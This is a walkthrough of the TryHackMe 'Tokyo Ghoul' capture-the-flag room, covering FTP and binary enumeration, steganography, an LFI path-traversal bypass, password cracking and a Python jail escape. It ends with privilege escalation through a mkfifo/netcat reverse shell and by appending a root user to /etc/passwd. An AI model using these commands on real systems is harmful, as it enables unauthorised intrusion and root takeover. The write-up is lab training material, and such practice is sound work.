THM ROOM: Tokyo Ghoul Walkthrough
Welcome to another exciting Try Hack Me adventure! In this write-up, we’ll be exploring the Tokyo Ghoul-themed machine to uncover its secrets and vulnerabilities. Buckle up, and let’s dive into the world of Tokyo Ghoul!
THM Challenge Link: https://tryhackme.com/room/tokyoghoul666
Reconnaissance:
Our adventure begins with an initial Nmap scan to discover open ports and services running on the target machine:
sudo nmap -sV -sS -A <IP>
- Port 21 (FTP) running VSFTPD 3.0.322.
- Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
- Port 80 (HTTP) hosting an Apache web server on Ubuntu.
Information Gathering:
FTP Anon Login:
First, we explore the FTP service, and to our delight, it allows anonymous login. We find a directory named “need_Help?” and discover some interesting files and directories:
- “Aogiri_tree.txt”
- “Talk_with_me” (directory)
- “rize_and_kaneki.jpg” an image file.
- “need_to_talk” an ELF file, Linux Executable
Our curiosity piqued, we decide to investigate the images and the ELF file for any hidden secrets.
Linux Binary Analysis:
I executed the need_to_talk elf file, which requires a password. After entering the random password, the message stating “Take a look inside of me rabin2 -z” displays.
After analyzing the binary, we may extract the ascii strings using strings or rabin2. Below image is the result.
We obtained the password by string extraction, and when i executed the program and entered the password we obtained, it displayed another string that could be a password for something.
Steganographic Analysis:
When I run stegseek on the image(rize_and_kaneki.jpg) we obtained from FTP, it asked for a passphrase. We now know that the password from the ELF file may be the password. Voila!! We extracted a text file named “yougotme.txt”
“yougotme.txt” contains the morse encoded data as well as two phrases.
- “haha you are so smart kaneki but can you talk my code”
- “if you can talk it all right, you got my secret directory,”
and it contains morse encoded data, which I will decode with CyberChef. When decoded, it gives hex encoded data, and when hex data is decoded, I get base64 encoded data, and when we decode it, we get a clear text indicating it is a web directory.
We navigate to the web server and open the decoded directory. A message simply says, “scan me.” This can be interpreted as a hint to use directory enumeration techniques to find hidden websites.
Web Directory Enumeration:
We launch a Gobuster scan to reveal potential subdirectories:
gobuster dir -u http://<IP>/<DECODED_DIRECTORY> -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
we discover the “/d1r3c70ry_center/claim” directory. However, it appears to be a Local File Inclusion (LFI) exploit that we must bypass.
LFI Bypass:
As i have trouble finding a solution to bypass the LFI vulnerability, i turn to resources such as HackTricks and numerous articles. We eventually come upon a GitHub repository that includes a potential bypass method: PayloadsAllTheThings.
Our exploration into Bypassing LFI vulnerabilities continues, and we eventually attack the issue using the URL-encoded path:
# URL Encoded, %2F == '/'; %2E == '.'
%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
# URL DECODED
/../../../etc/passwd
Now, with this LFI bypass, we gain access to system files, opening the door to further exploration.
User Enumeration:
With this newfound access, we decide to enumerate users on the system. After some exploration, we find the user “kamishiro.” We now have a foothold and will move forward to crack the password.
Cracking the password:
We crack the password for user “kamishiro” using John the Ripper. The very complicated and safe password is exposed after some time: “xxx”
We now have SSH access using the following credentials:
- Username: kamishiro
- Password: xxx
Initial Foothold:
I log in with SSH access and find myself in a limited environment. Because there isn’t much to investigate, our only option is to use the jail.py script.
Privilege Escalation:
I recall an article about Python jail escapes and sandbox exploitation and decide to explore the possibilities, trying different commands and statements. (Article about python jailbreak)
Exploiting python jail:
After reading it, I tried some trial and error till I found the exploit. It turns out that anything is contained within a “print” statement is executed. To accomplish my goal, I needed to combine a print statement with the Python sandbox escape.
# List available builtin functions
print(dir(__builtins__))
# Experimenting with importing built-in functions
print(__builtins__.__dict__['id'])
# Command chaining
print(__builtins__.__dict__['type']('as'))
print(__builtins__.__dict__['type'](123))
Now, we have a means to execute Linux commands from Python, bypassing the jail restrictions.
Privilege Escalation Methods
We proceed to escalate our privileges and explore two potential methods:
Method 1: Reverse Shell
- Open a listener on your local machine:
nc -nlvp 5555
- Execute the following command on the target machine:
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <YOUR_TUN0_IP> 5555 >/tmp/f'))
Method 2: Editing /etc/passwd
- Generate a hashed password:
openssl passwd toor
(This creates a password hash, e.g., '$1$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10') - Encode the entry for /etc/passwd:
echo "toor:\$1\$qw.JMQuz$RjNX2RLcJRGnz1/1jjhp10:0:0:root:/root:/bin/bash" | base64
# Output
# dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=
3. Execute the following command on the target machine:
print(__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('echo "dG9vcjokMSRESi9aS1hjbyQvQXVYMUJlN3JpR0xkT0FCUlBVTHguOjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d >> /etc/passwd'))
For greater clarity, below is a brief video for each of the procedures stated above.
Retrieving Flags:
With root access secured, we were able to retrieve both the user and root flags.
- The user flag was located in the “/home/kamishiro/user.txt” file.
- The root flag was stored in the “/root/root.txt” file.
Voila!!! Congratulations on clearing the Tokyo Ghoul room. Thanks to the creators (devalfo and rockyou.txt) for providing this fantastic room.